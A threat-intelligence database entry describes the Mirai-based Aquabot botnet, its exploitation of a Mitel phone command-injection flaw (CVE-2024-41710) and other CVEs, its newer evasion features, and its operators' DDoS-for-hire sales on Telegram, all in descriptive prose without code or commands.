Threat Database Botnets Aquabot Botnet

Aquabot Botnet

A Mirai-based botnet variant, known as Aquabot, has been detected actively attempting to exploit a security flaw affecting Mitel phones. The attackers aim to integrate these devices into a botnet capable of launching Distributed Denial-of-Service (DDoS) attacks.

The Vulnerability in Focus: CVE-2024-41710

The targeted security flaw, CVE-2024-41710, carries a CVSS score of 6.8 and stems from a command injection vulnerability in the boot process. This flaw may permit attackers to execute arbitrary commands within the phone's operating environment.

Affected Devices and Patch Details

The vulnerability impacts multiple Mitel phone models, including the 6800 Series, 6900 Series, 6900w Series SIP Phones, and the 6970 Conference Unit. Mitel addressed the issue in July 2024, but a proof-of-concept (PoC) exploit became publicly available in August, potentially opening the door for threat actors.

More than One Vulnerability in Play

Beyond CVE-2024-41710, Aquabot has been observed targeting additional vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, and CVE-2023-26801. The botnet has also attempted to exploit a remote code execution flaw in Linksys E-series devices, indicating a broad attack surface.

Aquabot: A Mirai-Based Botnet with a History

Aquabot is a botnet derived from the notorious Mirai framework, designed explicitly for executing DDoS attacks. Researchers have been tracking its activity since November 2023, with evidence of continuous evolution.

Exploiting the Flaw: Attack Mechanism

The first signs of active exploitation against CVE-2024-41710 emerged in early January 2025. Attackers deploy the botnet malware by executing a shell script, which retrieves the threatening payload using the 'wget' command. The attack method closely resembles the publicly available PoC exploit.

A Stealthier and More Advanced Variant

The Aquabot variant involved in these attacks appears to be the third iteration of the malware. It introduces a novel 'report_kill' function, which reports back to the Command-and-Control (C2) server whenever the botnet process is terminated. However, there is no evidence that this function triggers any immediate response from the server.

In addition, the new variant disguises itself as 'httpd.x86' to avoid detection and is programmed to terminate specific processes, such as local shells. These refinements suggest efforts to make Aquabot more evasive and potentially detect competing botnet activity.

Selling Access: The Underground DDoS-for-Hire Operation

Signs point to the threat actors behind Aquabot offering their botnet as a DDoS service on Telegram. They operate under aliases such as Cursinq Firewall, The Eye Services, and The Eye Botnet, leveraging compromised hosts to provide attack capabilities to paying customers.

The Bigger Picture: Mirai’s Lingering Threat

The resurgence of Mirai-based threats like Aquabot highlights the continued risks associated with internet-connected devices. Many of these devices suffer from inadequate security, outdated software, or default credentials, making them easy targets for exploitation.

A Misleading Justification from Attackers

Threat actors often claim their botnet operations are purely for testing or educational purposes, attempting to mislead researchers and law enforcement. However, further analysis frequently reveals their true intentions—offering DDoS services or openly boasting about their botnet activities in underground forums and Telegram channels.

Trending

Most Viewed

Loading...